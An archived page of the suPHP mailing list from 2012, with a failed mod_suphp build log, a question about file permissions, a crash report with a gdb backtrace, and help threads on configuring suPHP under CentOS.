mod_suphp.c:310: warning: assignment makes pointer from integer without a cast
mod_suphp.c:312: warning: assignment makes pointer from integer without a cast
mod_suphp.c:325: error: âsuphp_confâ has no member named âphp_pathâ
mod_suphp.c:329: error: âsuphp_confâ has no member named âphp_pathâ
mod_suphp.c:329: warning: passing argument 5 of âap_log_error_â makes integer from pointer without a cast
mod_suphp.c:329: warning: passing argument 6 of âap_log_error_â from incompatible pointer type
mod_suphp.c: At top level:
mod_suphp.c:336: error: expected declaration specifiers or â...â before âchild_infoâ
mod_suphp.c: In function âsuphp_childâ:
mod_suphp.c:339: error: âpoolâ undeclared (first use in this function)
mod_suphp.c:339: error: âpâ undeclared (first use in this function)
mod_suphp.c:351: warning: assignment makes pointer from integer without a cast
mod_suphp.c:368: warning: passing argument 5 of âap_log_error_â makes integer from pointer without a cast
mod_suphp.c:368: warning: passing argument 6 of âap_log_error_â from incompatible pointer type
mod_suphp.c:368: error: too few arguments to function âap_log_error_â
mod_suphp.c:376: warning: passing argument 5 of âap_log_error_â makes integer from pointer without a cast
mod_suphp.c:376: warning: passing argument 6 of âap_log_error_â from incompatible pointer type
mod_suphp.c:376: error: too few arguments to function âap_log_error_â
mod_suphp.c:384: warning: passing argument 5 of âap_log_error_â makes integer from pointer without a cast
mod_suphp.c:384: warning: passing argument 6 of âap_log_error_â from incompatible pointer type
mod_suphp.c:384: error: too few arguments to function âap_log_error_â
mod_suphp.c:392: warning: passing argument 5 of âap_log_error_â makes integer from pointer without a cast
mod_suphp.c:392: warning: passing argument 6 of âap_log_error_â from incompatible pointer type
mod_suphp.c:392: error: too few arguments to function âap_log_error_â
mod_suphp.c:412: warning: passing argument 5 of âap_log_error_â makes integer from pointer without a cast
mod_suphp.c:412: warning: passing argument 6 of âap_log_error_â from incompatible pointer type
mod_suphp.c: In function âsuphp_source_handlerâ:
mod_suphp.c:424: error: âpoolâ undeclared (first use in this function)
mod_suphp.c:424: error: âpâ undeclared (first use in this function)
mod_suphp.c:426: error: âBUFFâ undeclared (first use in this function)
mod_suphp.c:426: error: âscript_inâ undeclared (first use in this function)
mod_suphp.c:426: error: âscript_outâ undeclared (first use in this function)
mod_suphp.c:426: error: âscript_errâ undeclared (first use in this function)
mod_suphp.c:433: error: âsuphp_moduleâ undeclared (first use in this function)
mod_suphp.c:434: error: âsuphp_confâ has no member named âphp_pathâ
mod_suphp.c:445: warning: passing argument 5 of âap_log_rerror_â makes integer from pointer without a cast
mod_suphp.c:445: warning: passing argument 6 of âap_log_rerror_â from incompatible pointer type
mod_suphp.c:449: warning: passing argument 5 of âap_log_rerror_â makes integer from pointer without a cast
mod_suphp.c:449: warning: passing argument 6 of âap_log_rerror_â from incompatible pointer type
mod_suphp.c:453: warning: passing argument 5 of âap_log_rerror_â makes integer from pointer without a cast
mod_suphp.c:453: warning: passing argument 6 of âap_log_rerror_â from incompatible pointer type
mod_suphp.c:459: error: âkill_after_timeoutâ undeclared (first use in this function)
mod_suphp.c:462: warning: passing argument 5 of âap_log_rerror_â makes integer from pointer without a cast
mod_suphp.c:462: warning: passing argument 6 of âap_log_rerror_â from incompatible pointer type
mod_suphp.c: In function âsuphp_handlerâ:
mod_suphp.c:514: error: storage size of âfinfoâ isnât known
mod_suphp.c:521: error: âpoolâ undeclared (first use in this function)
mod_suphp.c:521: error: âpâ undeclared (first use in this function)
mod_suphp.c:523: error: âBUFFâ undeclared (first use in this function)
mod_suphp.c:523: error: âscript_inâ undeclared (first use in this function)
mod_suphp.c:523: error: âscript_outâ undeclared (first use in this function)
mod_suphp.c:523: error: âscript_errâ undeclared (first use in this function)
mod_suphp.c:527: error: âsuphp_moduleâ undeclared (first use in this function)
mod_suphp.c:539: error: âsuphp_confâ has no member named âhandlersâ
mod_suphp.c:539: warning: comparison between pointer and integer
mod_suphp.c:540: error: âsuphp_confâ has no member named âhandlersâ
mod_suphp.c:540: warning: comparison between pointer and integer
mod_suphp.c:541: error: âsuphp_confâ has no member named âhandlersâ
mod_suphp.c:541: error: invalid type argument of âunary *â
mod_suphp.c:544: error: âsuphp_confâ has no member named âhandlersâ
mod_suphp.c:544: error: invalid type argument of âunary *â
mod_suphp.c:563: warning: passing argument 5 of âap_log_rerror_â makes integer from pointer without a cast
mod_suphp.c:563: warning: passing argument 6 of âap_log_rerror_â from incompatible pointer type
mod_suphp.c:567: warning: passing argument 5 of âap_log_rerror_â makes integer from pointer without a cast
mod_suphp.c:567: warning: passing argument 6 of âap_log_rerror_â from incompatible pointer type
mod_suphp.c:571: warning: passing argument 5 of âap_log_rerror_â makes integer from pointer without a cast
mod_suphp.c:571: warning: passing argument 6 of âap_log_rerror_â from incompatible pointer type
mod_suphp.c:587: warning: initialization makes pointer from integer without a cast
mod_suphp.c:596: warning: assignment makes pointer from integer without a cast
mod_suphp.c:597: error: dereferencing pointer to incomplete type
mod_suphp.c:599: warning: assignment makes pointer from integer without a cast
mod_suphp.c:600: error: dereferencing pointer to incomplete type
mod_suphp.c:602: warning: assignment makes pointer from integer without a cast
mod_suphp.c:620: warning: passing argument 5 of âap_log_rerror_â makes integer from pointer without a cast
mod_suphp.c:620: warning: passing argument 6 of âap_log_rerror_â from incompatible pointer type
mod_suphp.c:620: error: too few arguments to function âap_log_rerror_â
mod_suphp.c:649: warning: assignment makes pointer from integer without a cast
mod_suphp.c:658: warning: assignment makes pointer from integer without a cast
mod_suphp.c:659: warning: assignment makes pointer from integer without a cast
mod_suphp.c:690: error: âkill_after_timeoutâ undeclared (first use in this function)
mod_suphp.c:693: warning: passing argument 5 of âap_log_rerror_â makes integer from pointer without a cast
mod_suphp.c:693: warning: passing argument 6 of âap_log_rerror_â from incompatible pointer type
mod_suphp.c:742: warning: assignment makes pointer from integer without a cast
mod_suphp.c:755: warning: assignment makes pointer from integer without a cast
mod_suphp.c:768: error: âREDIRECTâ undeclared (first use in this function)
mod_suphp.c: At top level:
mod_suphp.c:789: error: expected â=â, â,â, â;â, âasmâ or â__attribute__â before âsuphp_handlersâ
mod_suphp.c:798: error: expected â=â, â,â, â;â, âasmâ or â__attribute__â before âsuphp_moduleâ
make[3]: *** [mod_suphp.lo] Error 1
make[3]: Leaving directory `/root/suphp-0.7.1/src/apache'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/root/suphp-0.7.1/src'
make[1]: *** [all] Error 2
make[1]: Leaving directory `/root/suphp-0.7.1/src'
make: *** [all-recursive] Error 1



--
Regards
Jaseem 

_______________________________________________
suPHP mailing list
suPHP@...
https://lists.marsching.com/mailman/listinfo/suphp
Permalink | Reply | 0 comments |
headers
Daniel Ahern | 23 Sep 2012 19:18
Picon

660 permissions; need a system where multiple users are able to modify a php file

Hi,

I've got a little problem.

We're using a linux webserver with SuPHP, and I need multi-user support 
so that several programmers may have access to different files.

My intention was to use ACLs, but setfacl for user:programmer2:6 sets 
the mask to 6 (this is necessary, because the mask sets the highest 
level of permissions for users defined by ACLs) which also causes the 
group permission to be set to 6.  Of course, a file with 660 permissions 
will not be executed by SuPHP.

Is there any way around this or is it simply that SuPHP cannot be used 
if you need a system where multiple users are able to modify a php file?

Thanks,
Daniel
Permalink | Reply | 1 comment |
headers
Sylvain Rochet | 19 Aug 2012 17:24

mod suPHP crash while processing script output

Hi,

One of my hosted managed to crash apache childs with a script running 
through suPHP. Note the script is not meant to be executed as CGI, this 
is a regular script inside an abandoned directory index which is 
running by mistake by web crawlers because the httpd runs .sh scripts as 
CGI by default.

This is fully reproductible and I can give the script which makes it 
crash to anyone wanting to look deeper into this issue, there is nothing 
important in this script but I am not sure if disclosing the script here 
now is a very good idea.

The latest apache2 error log line is:

[Sun Aug 19 15:05:18 2012] [error] [client 127.0.0.1] malformed header from script. Bad header=#: hidden-script-name.sh

Which makes sense, because this is not a CGI script, note the script is 
still running perfectly after apache child crashed.

It looks like suPHP is trying to free() an uninitialised pointer, here 
is the tracedump:

(gdb) run -f /usr/local/apache2/conf/httpd.conf -X
Starting program: /usr/local/apache2/bin/httpd -f /usr/local/apache2/conf/httpd.conf -X
[Thread debugging using libthread_db enabled]
httpd: apr_sockaddr_info_get() failed for ornithopter
httpd: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName

Program received signal SIGSEGV, Segmentation fault.
0xf7f95ad5 in apr_bucket_free () from /usr/lib/libaprutil-1.so.0
(gdb) bt full
#0  0xf7f95ad5 in apr_bucket_free () from /usr/lib/libaprutil-1.so.0
No symbol table info available.
#1  0xf7fdba6d in suphp_read_fd (b=0xffeaddb8, str=0xffffb15c, len=0xffffb158,
block=APR_BLOCK_READ) at mod_suphp.c:458
No locals.
#2  suphp_bucket_read (b=0xffeaddb8, str=0xffffb15c, len=0xffffb158, block=APR_BLOCK_READ) at mod_suphp.c:493
        results = 0x81a66e0
        num = 1
        data = 0x81a6678
        timeout = 300000000
        rv = 14
        gotdata = 0
#3  0xf7fda5ab in suphp_discard_output (bb=<value optimized out>) at mod_suphp.c:533
        b = 0xffeaddb8
        buf = 0x0
        len = 0
        rv = <value optimized out>
#4  0xf7fdb6a4 in suphp_script_handler (r=<value optimized out>) at mod_suphp.c:1049
        ret = <value optimized out>
        location = <value optimized out>
        p = 0x819db80
        sconf = 0x81a6608
        dconf = 0x81a65e8
        finfo = {pool = 0x819db80, valid = 7598960, protection = 1365, filetype = APR_REG, user = 15718, group =
18078, inode = 11499806, device = 64768, nlink = 1, size = 56888, csize = 57344, atime = 1345387388760185,
mtime = 1190240767000000, ctime = 1345388715883782, 
          fname = 0x819f940 "/hidden/script/name", name = 0x8146b7b "lication/x-httpd-bash", filehand = 0x1}
        procattr = 0x81a6320
        argv = 0xffffd244
        env = 0x81a6608
        rv = 500
        strbuf = "#\000atus\000 500\000\000
text/html\000\067+squeeze14\000ÂÏ\n\bxk\024\b<÷\f\b\000\000\000\000\001\200­û\033³ÿÿ\033³ÿÿ\033³ÿÿ\033³ÿÿ2³ÿÿÿÿÿÿ\033³ÿÿÿÿÿÿ",
'\000' <repeats 48 times>, "\206§½÷\020Øø÷\000\000\000\000ÿÿÿÿôÏÿ÷ÿÿÿÿ\001\000\000\000Ȳÿÿféþ÷pÉ\024\bØË\024\b\001\000\000\000лÿÿ\000\002\000\000\035\000\000\000\000\000\000\000\035\000\000\000\220°ÿÿ\000\000\000\000\000\004\000\000\000\000\000\000p°ÿÿлÿÿû\002Î\003\003\000\000\000ôO"...
        tmpbuf = <value optimized out>
        auth_user = <value optimized out>
        auth_pass = <value optimized out>
        ud_user = 0x0
        ud_group = 0x0
        bb = 0x81a6608
        b = <value optimized out>
#5  0xf7fdbe00 in suphp_handler (r=0x819dbc0) at mod_suphp.c:569
        dconf = 0x819f488
#6  0x0807ff6b in ap_run_handler ()
No symbol table info available.
#7  0x08080696 in ap_invoke_handler ()
No symbol table info available.
#8  0x0809e032 in ap_process_request ()
No symbol table info available.
#9  0x0809b0ad in ap_process_http_connection ()
No symbol table info available.
#10 0x08088037 in ap_run_process_connection ()
No symbol table info available.
#11 0x0808844b in ap_process_connection ()
No symbol table info available.
#12 0x080b62af in child_main ()
No symbol table info available.
#13 0x080b639d in make_child ()
No symbol table info available.
#14 0x080b6938 in ap_mpm_run ()
No symbol table info available.
#15 0x08069f40 in main ()
No symbol table info available.
(gdb) 

Best regards,
Sylvain

_______________________________________________
suPHP mailing list
suPHP@...
https://lists.marsching.com/mailman/listinfo/suphp
Permalink | Reply | 2 comments |
headers
Joe Gillotti | 11 Jul 2012 08:53
Favicon
Gravatar

Re: suPHP not working centos 6.2

You currently have mod_php and suPHP enabled in apache.

Either delete or move out of the way conf.d/php.conf as that is what is 
including mod_php

You can see it for yourself in the phpinfo() snippet you pasted: "Server 
API     Apache 2.0 Handler "

Also you may need to change "AddType application/x-httpd-php .php" to 
"AddType x-httpd-php .php" in your httpd.conf so it matches what suphp 
is supposed to look for.

On 7/10/2012 1:59 PM, Shane Graham wrote:
> Server API Apache 2.0 Handler
Permalink | Reply | 0 comments |
headers
Shane Graham | 10 Jul 2012 19:59
Favicon

suPHP not working centos 6.2

Hello,

I've been trying to get suPHP working on all my servers but I am having trouble. Every time I comment out the php_module I get about 20 errors and i have run out of options as I am running php as apache and I really do not want to do that. attached are my config files. I removed some information like the sites on it and the directories and paths to the ssl certificates.

Some information on the server

PHP Version 5.3.3


System Linux i-585-2924-VM 2.6.32-220.13.1.el6.x86_64 #1 SMP Tue Apr 17 23:56:34 BST 2012 x86_64
Build Date May 7 2012 20:14:24
Configure Command './configure' '--build=x86_64-redhat-linux-gnu' '--host=x86_64-redhat-linux-gnu' '--target=x86_64-redhat-linux-gnu' '--program-prefix=' '--prefix=/usr' '--exec-prefix=/usr' '--bindir=/usr/bin' '--sbindir=/usr/sbin' '--sysconfdir=/etc' '--datadir=/usr/share' '--includedir=/usr/include' '--libdir=/usr/lib64' '--libexecdir=/usr/libexec' '--localstatedir=/var' '--sharedstatedir=/var/lib' '--mandir=/usr/share/man' '--infodir=/usr/share/info' '--cache-file=../config.cache' '--with-libdir=lib64' '--with-config-file-path=/etc' '--with-config-file-scan-dir=/etc/php.d' '--disable-debug' '--with-pic' '--disable-rpath' '--without-pear' '--with-bz2' '--with-exec-dir=/usr/bin' '--with-freetype-dir=/usr' '--with-png-dir=/usr' '--with-xpm-dir=/usr' '--enable-gd-native-ttf' '--without-gdbm' '--with-gettext' '--with-gmp' '--with-iconv' '--with-jpeg-dir=/usr' '--with-openssl' '--with-pcre-regex=/usr' '--with-zlib' '--with-layout=GNU' '--enable-exif' '--enable-ftp' '--enable-magic-quotes' '--enable-sockets' '--enable-sysvsem' '--enable-sysvshm' '--enable-sysvmsg' '--with-kerberos' '--enable-ucd-snmp-hack' '--enable-shmop' '--enable-calendar' '--without-sqlite' '--with-libxml-dir=/usr' '--enable-xml' '--with-system-tzdata' '--with-apxs2=/usr/sbin/apxs' '--without-mysql' '--without-gd' '--disable-dom' '--disable-dba' '--without-unixODBC' '--disable-pdo' '--disable-xmlreader' '--disable-xmlwriter' '--without-sqlite3' '--disable-phar' '--disable-fileinfo' '--disable-json' '--without-pspell' '--disable-wddx' '--without-curl' '--disable-posix' '--disable-sysvmsg' '--disable-sysvshm' '--disable-sysvsem'
Server API Apache 2.0 Handler
Virtual Directory Support disabled
Configuration File (php.ini) Path /etc
Loaded Configuration File /etc/php.ini
Scan this dir for additional .ini files /etc/php.d
Additional .ini files parsed /etc/php.d/curl.ini, /etc/php.d/dom.ini, /etc/php.d/fileinfo.ini, /etc/php.d/gd.ini, /etc/php.d/json.ini, /etc/php.d/ldap.ini, /etc/php.d/mbstring.ini, /etc/php.d/mcrypt.ini, /etc/php.d/mssql.ini, /etc/php.d/mysql.ini, /etc/php.d/mysqli.ini, /etc/php.d/odbc.ini, /etc/php.d/pdo.ini, /etc/php.d/pdo_dblib.ini, /etc/php.d/pdo_mysql.ini, /etc/php.d/pdo_odbc.ini, /etc/php.d/pdo_sqlite.ini, /etc/php.d/phar.ini, /etc/php.d/snmp.ini, /etc/php.d/soap.ini, /etc/php.d/sqlite3.ini, /etc/php.d/tidy.ini, /etc/php.d/wddx.ini, /etc/php.d/xmlreader.ini, /etc/php.d/xmlrpc.ini, /etc/php.d/xmlwriter.ini, /etc/php.d/xsl.ini, /etc/php.d/zip.ini
PHP API 20090626
PHP Extension 20090626
Zend Extension 220090626
Zend Extension Build API220090626,NTS
PHP Extension Build API20090626,NTS
Debug Build no
Thread Safety disabled
Zend Memory Manager enabled
Zend Multibyte Support disabled
IPv6 Support enabled
Registered PHP Streams https, ftps, compress.zlib, compress.bzip2, php, file, glob, data, http, ftp, phar, zip
Registered Stream Socket Transports tcp, udp, unix, udg, ssl, sslv3, sslv2, tls
Registered Stream Filters zlib.*, bzip2.*, convert.iconv.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk, mcrypt.*, mdecrypt.*

Configuration

apache2handler

Apache Version Apache/2.2.15 (CentOS)
Apache API Version 20051115
Server Administrator root <at> localhost
Hostname:Port amssm.org:0
User/Group apache(48)/48
Max Requests Per Child: 4000 - Keep Alive: off - Max Per Connection: 100
Timeouts Connection: 60 - Keep-Alive: 15
Virtual Server Yes
Server Root /etc/httpd
Loaded Modules core prefork http_core mod_so mod_auth_basic mod_auth_digest mod_authn_file mod_authn_alias mod_authn_anon mod_authn_dbm mod_authn_default mod_authz_host mod_authz_user mod_authz_owner mod_authz_groupfile mod_authz_dbm mod_authz_default util_ldap mod_authnz_ldap mod_include mod_log_config mod_logio mod_env mod_ext_filter mod_mime_magic mod_expires mod_deflate mod_headers mod_usertrack mod_setenvif mod_mime mod_dav mod_status mod_autoindex mod_info mod_dav_fs mod_vhost_alias mod_negotiation mod_dir mod_actions mod_speling mod_userdir mod_alias mod_substitute mod_rewrite mod_proxy mod_proxy_balancer mod_proxy_ftp mod_proxy_http mod_proxy_ajp mod_proxy_connect mod_cache mod_suexec mod_disk_cache mod_cgi mod_version mod_fcgid mod_php5 mod_python mod_ruby mod_ssl mod_suphp
echo exec('/usr/bin/whoami');  // echo's apache



Any help at all would be greatly appreciated.

Thank you,
Shane Graham
Computer-Geek.net
Attachment (config.zip): application/zip, 33 KiB
_______________________________________________
suPHP mailing list
suPHP@...
https://lists.marsching.com/mailman/listinfo/suphp
Permalink | Reply | 0 comments |

Gmane